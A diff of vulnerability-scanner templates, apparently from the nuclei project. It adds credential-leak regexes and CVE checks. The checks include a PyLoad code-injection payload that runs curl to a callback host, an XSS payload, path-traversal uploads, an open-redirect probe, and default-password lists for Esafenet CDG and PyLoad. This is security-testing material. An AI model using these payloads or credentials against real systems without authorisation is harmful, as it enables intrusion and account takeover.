- '(?i)codeclima.{0,50}\b([a-f0-9]{64})\b' - '(?i)codeclima.{0,50}\b([a-f0-9]{64})\b'
# Enhanced by md on 2023/05/04

View File

@ -1,13 +1,18 @@
id: cratesio-api-key id: cratesio-api-key
info: info:
name: Crates.io API Key name: Crates.io API Key - Detect
author: DhiyaneshDK author: DhiyaneshDK
severity: info severity: info
description: Crates.io API key was detected.
reference: reference:
- https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/crates.io.yml - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/crates.io.yml
- https://crates.io/data-access - https://crates.io/data-access
- https://github.com/rust-lang/crates.io/blob/master/src/util/token.rs - https://github.com/rust-lang/crates.io/blob/master/src/util/token.rs
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata: metadata:
verified: true verified: true
tags: crates,token,file tags: crates,token,file
@ -21,3 +26,5 @@ file:
part: body part: body
regex: regex:
- '\bcio[a-zA-Z0-9]{32}\b' - '\bcio[a-zA-Z0-9]{32}\b'
# Enhanced by md on 2023/05/04

View File

@ -1,6 +1,13 @@
id: credentials-disclosure-file id: credentials-disclosure-file
# Extract secrets regex like api keys, password, token, etc ... for different services info:
name: Credentials Disclosure Check
author: Sy3Omda,geeknik,forgedhallpass,ayadi
severity: unknown
description: Check for multiple keys/tokens/passwords hidden inside of files.
tags: exposure,token,file,disclosure
# Extract secrets regex like api keys, password, token, etc ... for different services.
# Always validate the leaked key/tokens/passwords to make sure it's valid, a token/keys without any impact is not an valid issue. # Always validate the leaked key/tokens/passwords to make sure it's valid, a token/keys without any impact is not an valid issue.
# Severity is not fixed in this case, it varies from none to critical depending upon impact of disclosed key/tokes. # Severity is not fixed in this case, it varies from none to critical depending upon impact of disclosed key/tokes.
# Regex count:- 687 # Regex count:- 687
@ -9,14 +16,6 @@ id: credentials-disclosure-file
# This template requires manual inspection once found valid match. # This template requires manual inspection once found valid match.
# Generic token could be anything matching below regex. # Generic token could be anything matching below regex.
# Impact of leaked token depends on validation of leaked token. # Impact of leaked token depends on validation of leaked token.
info:
name: Credentials Disclosure Check
author: Sy3Omda,geeknik,forgedhallpass,ayadi
severity: unknown
description: Look for multiple keys/tokens/passwords hidden inside of files.
tags: exposure,token,file,disclosure
# The regexes are copied from exposures/tokens/generic/credentials-disclosure.yaml # The regexes are copied from exposures/tokens/generic/credentials-disclosure.yaml
# TODO After https://github.com/projectdiscovery/nuclei/issues/1510 is implemented, we should be able to re-use them, instead of duplicating # TODO After https://github.com/projectdiscovery/nuclei/issues/1510 is implemented, we should be able to re-use them, instead of duplicating
# Example cases to match against: https://regex101.com/r/HPtaU2/1 # Example cases to match against: https://regex101.com/r/HPtaU2/1
@ -719,3 +718,5 @@ file:
- "(?i)[\"']?access[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?access[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- "(?i)[\"']?access[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?access[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\s)*(:|=)+" - "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\s)*(:|=)+"
# Enhanced by md on 2023/05/04

View File

@ -1,9 +1,14 @@
id: basic-auth-creds id: basic-auth-creds
info: info:
name: Basic Auth Credentials name: Basic Authorization Credentials Check
author: gaurang author: gaurang
severity: high severity: high
description: Basic authorization credentials check was conducted.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-200
tags: token,file,auth tags: token,file,auth
file: file:
@ -14,3 +19,5 @@ file:
- type: regex - type: regex
regex: regex:
- "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]" - "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]"
# Enhanced by md on 2023/05/04

View File

@ -1,9 +1,14 @@
id: dynatrace-token id: dynatrace-token
info: info:
name: Dynatrace Token name: Dynatrace Token - Detect
author: gaurang author: gaurang
severity: high severity: high
description: Dynatrace token was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-200
tags: token,file tags: token,file
file: file:
@ -14,3 +19,5 @@ file:
- type: regex - type: regex
regex: regex:
- "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}" - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}"
# Enhanced by md on 2023/05/04

View File

@ -1,9 +1,14 @@
id: facebook-client-id id: facebook-client-id
info: info:
name: Facebook Client ID name: Facebook Client ID - Detect
author: gaurang author: gaurang
severity: info severity: info
description: Facebook client ID token was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: token,file,facebook tags: token,file,facebook
file: file:
@ -14,3 +19,5 @@ file:
- type: regex - type: regex
regex: regex:
- "(?i)(facebook|fb)(.{0,20})?['\"][0-9]{13,17}['\"]" - "(?i)(facebook|fb)(.{0,20})?['\"][0-9]{13,17}['\"]"
# Enhanced by md on 2023/05/04

View File

@ -1,9 +1,10 @@
id: facebook-secret-key id: facebook-secret-key
info: info:
name: Facebook Secret Key name: Facebook Secret Key - Detect
author: gaurang author: gaurang
severity: low severity: low
description: Facebook secret key token was detected.
tags: token,file,facebook tags: token,file,facebook
file: file:
@ -14,3 +15,5 @@ file:
- type: regex - type: regex
regex: regex:
- "(?i)(facebook|fb)(.{0,20})?(?-i)['\"][0-9a-f]{32}['\"]" - "(?i)(facebook|fb)(.{0,20})?(?-i)['\"][0-9a-f]{32}['\"]"
# Enhanced by md on 2023/05/04

View File

@ -1 +1 @@
4.4.0.1 4.4.1

View File

@ -1 +1 @@
2.0.26 2.0.27

View File

@ -1 +1 @@
3.4.1 3.4.2

View File

@ -1 +1 @@
3.0.26 3.0.27

View File

@ -1 +1 @@
1.24.4 1.24.6

View File

@ -1 +1 @@
12.2.1 12.3

View File

@ -1 +1 @@
3.32.0 3.33.0

View File

@ -1 +1 @@
3.36 3.37

View File

@ -1 +1 @@
3.6.27 3.6.28

View File

@ -1 +1 @@
9.3.9 9.4.0.1

View File

@ -1 +1 @@
7.0.5 7.0.6

View File

@ -1 +1 @@
2.1.4 2.1.5

View File

@ -1 +1 @@
1.23.6 1.23.7

View File

@ -1 +1 @@
3.2.15 3.2.16

View File

@ -1 +1 @@
3.13.1 3.13.2

View File

@ -1 +1 @@
2.8.0 2.9.0

View File

@ -1 +1 @@
0.9.87 0.9.88

View File

@ -3,7 +3,7 @@ info:
name: Gitlab Login Check Self Hosted name: Gitlab Login Check Self Hosted
author: parthmalhotra,pdresearch author: parthmalhotra,pdresearch
severity: critical severity: critical
description: Checks for a valid login on self hosted Grafana instance. description: Checks for a valid login on self hosted GitLab instance.
reference: reference:
- https://owasp.org/www-community/attacks/Credential_stuffing - https://owasp.org/www-community/attacks/Credential_stuffing
metadata: metadata:

View File

@ -0,0 +1,34 @@
id: CVE-2012-5321
info:
name: TikiWiki CMS Groupware v8.3 - Open Redirect
author: ctflearner
severity: medium
description: |
tiki-featured_link.php in TikiWiki CMS/Groupware 8.3 allows remote attackers to load arbitrary web site pages into frames and conduct phishing attacks via the url parameter, aka "frame injection
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-5321
- https://www.exploit-db.com/exploits/36848
- http://st2tea.blogspot.com/2012/02/tiki-wiki-cms-groupware-frame-injection.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/73403
classification:
cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N
cvss-score: 5.8
cve-id: CVE-2012-5321
cwe-id: CWE-20
cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.html:"tiki wiki"
tags: cve,cve2012,redirect,tikiwiki,groupware
http:
- method: GET
path:
- "{{BaseURL}}/tiki-featured_link.php?type=f&url=https://interact.sh"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'

View File

@ -21,7 +21,7 @@ info:
http: http:
- raw: - raw:
- | # REQUEST 1 - |
POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1 POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137 Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
@ -34,8 +34,8 @@ http:
-----------------------------154934846911423734231554128137-- -----------------------------154934846911423734231554128137--
- | # REQUEST 2 - |
GET /logos_clients/1.php HTTP/1.1 GET /logos_clients/{{randstr}}.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
matchers-condition: and matchers-condition: and

View File

@ -35,16 +35,15 @@ http:
------WebKitFormBoundaryoZ8meKnrrso89R6Y ------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc" Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc"
test-poc {{randstr}}
------WebKitFormBoundaryoZ8meKnrrso89R6Y-- ------WebKitFormBoundaryoZ8meKnrrso89R6Y--
- method: GET - |
path: GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1
- '{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc'
matchers: matchers:
- type: dsl - type: dsl
dsl: dsl:
- 'contains(body, "test-poc") && status_code == 200' # Using CVE-2020-17519 to confirm this. - 'contains(body_2, "{{randstr}}") && status_code == 200' # Using CVE-2020-17519 to confirm this.

View File

@ -77,17 +77,15 @@ http:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status
status:
- 200
- type: word - type: word
part: body
words: words:
- 'success":true' - 'success":true'
- 'fullname' - 'fullname'
- 'shortname' - 'shortname'
- 'url' - 'url'
condition: and condition: and
part: body
- type: status
status:
- 200

View File

@ -64,12 +64,10 @@ http:
condition: and condition: and
- type: word - type: word
part: header
words: words:
- application/json - application/json
part: header
- type: status - type: status
status: status:
- 200 - 200

View File

@ -19,7 +19,7 @@ info:
epss-score: 0.96822 epss-score: 0.96822
metadata: metadata:
max-request: 2 max-request: 2
tags: unauth,cve,fileupload,monitorr,edb,intrusive,packetstorm,cve2020,rce tags: unauth,cve,fileupload,monitor,edb,intrusive,packetstorm,cve2020,rce
http: http:
- raw: - raw:

View File

@ -17,7 +17,7 @@ info:
cwe-id: CWE-434 cwe-id: CWE-434
cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:*:*:* cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:*:*:*
epss-score: 0.90859 epss-score: 0.90859
tags: cve,cve2020,wordpress,wp-plugin,rce,fileupload,intrusive tags: cve,cve2020,wordpress,wp-plugin,rce
metadata: metadata:
max-request: 1 max-request: 1

View File

@ -41,15 +41,6 @@ http:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
part: header
- type: word - type: word
words: words:
- '{"result":' - '{"result":'
@ -57,4 +48,11 @@ http:
- '/tmp/passwd9' - '/tmp/passwd9'
condition: and condition: and
- type: word
words:
- "application/json"
part: header
- type: status
status:
- 200

View File

@ -44,15 +44,15 @@ http:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status
status:
- 200
- type: word - type: word
words: words:
- "File uploaded successfully." - "File uploaded successfully."
part: body part: body
- type: dsl - type: dsl
dsl: dsl:
- "len(body) == 28" # length of "\nFile uploaded successfully." - "len(body) == 28" # length of "\nFile uploaded successfully."
- type: status
status:
- 200

View File

@ -37,7 +37,7 @@ http:
Content-Disposition: form-data; name="file"; filename="poc.txt" Content-Disposition: form-data; name="file"; filename="poc.txt"
Content-Type: image/png Content-Type: image/png
POC_TEST {{randstr}}
------WebKitFormBoundarySHHbUsfCoxlX1bpS ------WebKitFormBoundarySHHbUsfCoxlX1bpS
@ -47,19 +47,18 @@ http:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status
status:
- 200
- type: word - type: word
part: body_2
words: words:
- "POC_TEST" - "{{randstr}}"
part: body
- type: word - type: word
part: header
words: words:
- "text/plain" - "text/plain"
- "ASP.NET" - "ASP.NET"
condition: and condition: and
part: header
- type: status
status:
- 200

View File

@ -20,7 +20,7 @@ info:
metadata: metadata:
max-request: 3 max-request: 3
verified: true verified: true
tags: cve,cve2021,elfinder,upload,rce,intrusive tags: cve,cve2021,elfinder,fileupload,rce,intrusive
http: http:
- raw: - raw:

View File

@ -28,13 +28,11 @@ http:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: regex
part: location part: location
words: regex:
- '//interactsh.com/../' - '^\s*//interactsh.com/\.\.'
- type: status - type: status
status: status:
- 301 - 301

View File

@ -0,0 +1,51 @@
id: CVE-2023-0297
info:
name: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
author: MrHarshvardhan,DhiyaneshDk
severity: critical
description: |
Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.
reference:
- https://www.exploit-db.com/exploits/51532
- https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1058
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-0297
cwe-id: CWE-94
cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
metadata:
max-request: 2
verified: true
shodan-query: html:"pyload"
tags: huntr,cve,cve2023,rce,pyload,oast
variables:
cmd: "curl {{interactsh-url}}"
http:
- raw:
- |
GET /flash/addcrypted2 HTTP/1.1
Host: {{Hostname}}
- |
POST /flash/addcrypted2 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
jk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- 'JDownloader'
- type: word
part: interactsh_protocol
words:
- "dns"

View File

@ -0,0 +1,42 @@
id: CVE-2023-2822
info:
name: Ellucian Ethos Identity CAS - Cross-Site Scripting
author: Guax1
severity: medium
description: |
A vulnerability was found in Ellucian Ethos Identity up to 5.10.5. It has been classified as problematic. Affected is an unknown function of the file /cas/logout. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely.
remediation: Upgrading to version 5.10.6 is able to address this issue. It is recommended to upgrade the affected component.
reference:
- https://medium.com/@cyberninja717/685bb1675dfb
- https://medium.com/@cyberninja717/reflected-cross-site-scripting-vulnerability-in-ellucian-ethos-identity-cas-logout-page-685bb1675dfb
- https://vuldb.com/?ctiid.229596
- https://vuldb.com/?id.229596
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-2822
cwe-id: CWE-79
metadata:
max-request: 1
shodan-query: html:"Ellucian Company"
google-query: "login with ellucian ethos identity"
tags: cve,cve2023,cas,xss,ellucian
http:
- method: GET
path:
- '{{BaseURL}}/cas/logout?url=https://oast.pro"><img%20src=x%20onerror=alert(document.domain)>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=x onerror=alert(document.domain)>'
- 'Identity Server'
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,52 @@
id: esafenet-cdg-default-login
info:
name: Esafenet CDG - Default Login
author: chesterblue
severity: high
description: |
Esafenet electronic document security management system default credentials were discovered.
metadata:
verified: true
fofa-query: "esafenet"
tags: esafenet,cdg,default-login
http:
- method: POST
path:
- "{{BaseURL}}/CDGServer3/SystemConfig"
headers:
content-type: application/x-www-form-urlencoded
body: "command=Login&help=null&verifyCodeDigit=dfd&name={{username}}&pass={{password}}"
attack: clusterbomb
payloads:
username:
- "systemadmin"
- "configadmin"
- "secadmin"
- "docadmin"
password:
- "Est@Spc820"
- "12345678"
- "123456"
- "Est@Spc2018"
- "Est@Spc2019"
- "Est@Spc2020"
- "Est@Spc2021"
- "Est@Spc2022"
matchers-condition: and
matchers:
- type: word
words:
- "est.connection.url"
- type: regex
part: body
regex:
- "(127\\.0\\.0\\.1)|(localhost)(192\\.168|10\\.|172\\.(1[6-9]|2\\d|3[01]))\\.\\d{1,3}\\.\\d{1,3}"
- type: status
status:
- 200

View File

@ -0,0 +1,44 @@
id: pyload-default-login
info:
name: PyLoad Default Login
author: DhiyaneshDk
severity: high
description: |
PyLoad Default Credentials were discovered.
reference:
- https://pypi.org/project/pyload-ng/#:~:text=Default%20username%3A%20pyload%20.,Default%20password%3A%20pyload%20.
metadata:
max-request: 1
verified: true
shodan-query: html:"pyload"
tags: default-login,pyload
http:
- raw:
- |
POST /login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
do=login&username={{username}}&password={{password}}&submit=Login
payloads:
username:
- pyload
password:
- pyload
attack: pitchfork
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'Set-Cookie: pyload_session='
- '/dashboard'
condition: and
- type: status
status:
- 302

View File

@ -0,0 +1,22 @@
id: hookbot-rat
info:
name: Hookbot Rat Panel - Detect
author: pussycat0x
severity: info
description: |
Hookbot panel were detected.
metadata:
verified: true
shodan-query: title:"hookbot"
tags: tech,rat,hookbot,c2,panel,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- "status_code == 200 && contains(body, 'HOOKBOT PANEL')"

View File

@ -0,0 +1,36 @@
id: pyload-panel
info:
name: PyLoad Login - Panel
author: DhiyaneshDk
severity: info
description: |
A Pyload Login was detected.
reference:
- https://github.com/pyload/pyload
metadata:
max-request: 2
shodan-query: title:"Login - pyLoad"
verified: true
tags: panel,pyload,login
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/login"
stop-at-first-match: true
host-redirects: true
matchers-condition: and
matchers:
- type: word
words:
- 'Login - pyLoad'
- 'alt="Pyload'
condition: or
case-insensitive: true
- type: status
status:
- 200

Some files were not shown because too many files have changed in this diff Show More